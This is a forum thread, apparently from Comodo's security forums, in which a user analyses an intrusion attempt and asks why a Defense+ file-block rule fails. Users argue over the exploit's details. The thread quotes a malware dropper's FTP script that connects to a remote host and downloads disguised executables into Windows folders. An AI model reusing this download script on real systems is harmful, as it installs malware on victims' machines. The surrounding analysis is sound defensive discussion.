If you ever come across Comodo’s CEO posts in these forums, as it occurred to me that being a new member you may not have read any of them yet, you may eventually confirm how much of a joker I was. You don’t have to believe me nor rely on my advices either.
During the exploit what did you see on the monitor?
What happened to the cmd.exe process (owned by WMIPrvSE.exe) after the exploit?
What alert/s did you actually get?
What alert/s did you actually allow?
Did you get a run an executable alert for cmd.exe and then grabbed a screenshot with Process Explorer during the 120 seconds that alert was going to stay on screen?
Did you allow some alert alerts to get those files on you hd? If so what alerts?
I suppose again you never heard of egemen anyway I’ve read his posts asking members to setup a VPN to identify specific issues.
This way you could also be able to explain your testcases and your doubts to him directly.
Why?
Is it not funny to see 40 updated AV fail on recognize a new malware?
Shouldn’t I be happy to have my system protected for free by a powerful proactive protecion software as CIS is, without having to update it hundreds of times a year like those failing AV?
Just to be sure b.exe was a malware I started it with D+ in paranoid mode (that’s my default mode) and C:* present on “My Protected Files” list.
The first thing b.exe does is to create 1.ftp file inside %windir%/help folder.
Then it calls ftp
So b.exe is just a downloader so it’s not uncommon that it isn’t recognized as malware by AV engines.
This is 1.ftp contents
open smtp.atto.tv
user f
t
binary
get svchost32.exe C:\WINDOWS\help\svchost32.exe
get rundll32.exe C:\WINDOWS\help\rundll32.exe
get notepad16.exe C:\WINDOWS\notepad16.exe
bye
I have manually downloaded all the three files and again sent them to VirusTotal.
These are the results:
svchost32.exe - 4 positive on 39
rundll32.exe - 16 positive on 39
notepad16.exe - 4 positive on 40
Shouldn’t I be happy and laugh to don’t waste my system resource to make an AV running on it?
How many questions! why are you so interested on how it happened this kind of intrusion attempt that will never hurt your layered protected system(s)?
Replies:
1)Nothing. Unless by “monitor” you mean TCP connection monitor; in this case I saw an established connection between “system” process and a remote host.
2)It executes its given arguments and then terminate
3)Many weeks are past from the first intrusion attempt, so I’m not sure about my recall. It think the first alert was about CMD.EXE attempt to create FTP.EXE process.
4)Don’t remember… maybe to execute FTP.
5)Yes… but the screen was taken yesterday when I reproduced the intrusion attempt leaving my system service exposed to Internet
6)Sorry, again I’m not sure about what I remember… Maybe I got an alert for FTP attempt to create C:\aa.exe file… so I checked C: root and found there all the newly create files.
Thanks again for the suggestion layman.
Your instructions will work for sure if I follow them… but that will prevent CMD.EXE from run any executable (except those present in the “Allowed Application” list, as you stated).
However the topic is about to prevent CMD.EXE from creating/modify any file on a specified folder.
But your suggestion drove my to think again about the “ask” “allow” “block” access rights and the related exception list.
Then I got this idea:
I could set “Access Rights”->“Protected File/Folders” to “Block” and then eventually add exceptions to the “Allowed File/Folders” list.
Well… strange enough it doesn’t work the way it is supposed to.
Test file batch (e:\tt.bat):
echo > c:\Test.txt
ftp
If I set “Access Rights”->“Run an executable” to “block” then, when I start my test file, the ftp command is intercepted by D+, blocked without any alert, and the action recorded on the D+ events list.
But… If I set “Access Rights”->“Protected File/Folders” to “Block” then, when I start my test file, the C:\test.txt file is created anyway (!) ???
As always, test was made with D+ in paranoid mode; I tried it also with D+ option “trust on application digitally signed by Trusted Software Vendors” disabled
It seems to me that this is a kind of “misbehaviour” as the “block” default action doesn’t work for “Protected File/Folders” as it works, for instance, for “Run an executable”.
As my CIS (ver 3.8.65951.477) is not updated maybe this “misbehaviour” has been fixed already on later CIS versions.
Please layman, can you try my test file/settings on your system too and let me know how it works?
You never confirmed the details of the exploit but you carried all the possible practices to make the exploit work in the first place. (Eg: having it bypass the firewall with non-disabled vulnerable services exposed without any patch)
Your above quoted reply apparently mention what supposedly happened by mixing yesterday and weeks past without any apparent reason.
Still, you never described what you actually did yesterday when you purposely get the exploit activate again apart from that you disabled the firewall, and got at least a D+ alert.
BTW It is not even clear what CIS configuration defaults (eg CIS Proactive security) and D+ mode (eg D+ paranoid mode) you used many weeks past.
As it is unlikely the exploit was undetected without triggering any alerts (even more if D+ wasn’t disabled too)
Although you confirmed that cmd.exe process (owned by WMIPrvSE.exe) automatically terminate itself it is not clear either if the cmd shell is visible on screen or on the taskbar.
Indeed your approach had me interested in many neglected details. I hope you don’t mind as I never argued about having Sat-DSL or HDSPA for those who use a 56K connection…
I haven’t sent a PM to egemen yet as I guess that the first reply I’ll get would be: updated your CIS and try again.
As I can’t update if I PM to egemen I bet I’m going to waste his and my time.
I told you already that actually my system is already configured to prevent the scenario I was involved weeks ago… yet, even the very first intrusion attempt were intercepeted by F+ (In safe mode) and if I didn’t allow the incoming connection the intrusion attempt would have failed immediately.
However I have to note that non “advanced user” and non English-speaking people may reply to the alert allowing the incoming connection without really know what’s going to happen.
That’s not my case… I was just curious about the intrusion attempt (the first ever I was aware of… coz any previous were blocked by Windows firewall without any alert) and I posted here how it works just as record of an “all day” still running intrusion attempt that threat a lot of Internet users (at least a lot of Italians).
But the topic of this discussion is not “how to prevent” that kind of intrusion attempt… it’s how to prevent a process to write/modify file/folders on a specified path.
So, from now on, I’m sorry I won’t reply to any more question regarding the intrusion attempt I mentioned.
Yesterday (the day before) I was with CIS in proactive mode and D+ in paranoid mode and I was alerted of CMD.EXE attempt to create a new file (see the attached picture to the first post) because I had already add C:* to the “My Protected Files” list.
I told you already that “nothing” is/was visible on the monitor/screen/display
No more off topic please…
instead…
could you please set CMD.EXE “Access Rights”->“Protected File/Folders” to “Block” and try to create a new file from command prompt and then tell me if D+ has block the file creation attempt or not?
Ok you are not willing to send a PM to egemen but you ar willing to provide conjectures about that.
Yep you are not interested in many aspects of the exploit+payload itself but you are willing to provide a conjecture about what other users would do in order to let the exploit attempt start.
You were curious about the payload (what the exploit attempt to do) but not about the exploit.
You choose to mention the exploit scenario but this doesn’t mean the details about the exploit should be neglected because you were willing only to mention the payload.
As you purposely let the exploit hit your system it is somewhat confusing to provide an approximate description of the exploit behavior apart for mentioning that you disabled the firewall and got an alert. It would help if you clarified some aspects of exploit during its activation but apparently you are not willing to supposedly because you got the impression you already told them although a detailed and thorough description about all alert and visible activities in a single specific post (eg using the CIS proactive defaults) whitouth mixing two different events (eg yesterday and weeks past) would provide way more info than unclear snippets alll around this topic.
Despite apparently not or else there would be no explanation, eg, about your OT outburst of “enjoyment”
Then you apparently got your answer even before creating this topic although coincidentally you are unable to provide a description of what alerts were going to be displayed using CIS proactive config defaults (BTW the above quoted re-configuration is unlikely to trigger only the single alert pertaining the payload you attached to your first post.).
BTW your rely was:
Thanks for confirming that the first part of the reply was meant for monitor/screen/display
Guess I got confused by what you suggested “monitor” was. I wondered how many monitors you implicitly implied and thus what monitor your “nothing” reply was about.
BTW You introduced the actual topic span by your first post yourself despite the title mention only a part of it…
Thus despite the topic title it is unexpected you intention to not clarify further the exploit itself and your apparent discomfort/reluctance to have a developer analyze it along with the commandline payload (and not the payload alone).
) but I gather you are not sure it was a BO. Up to this point you didn’t provide much info about the exploit itself (other than the payload). Anyway it is likely egemen will be able to confirm what type of exploit it was.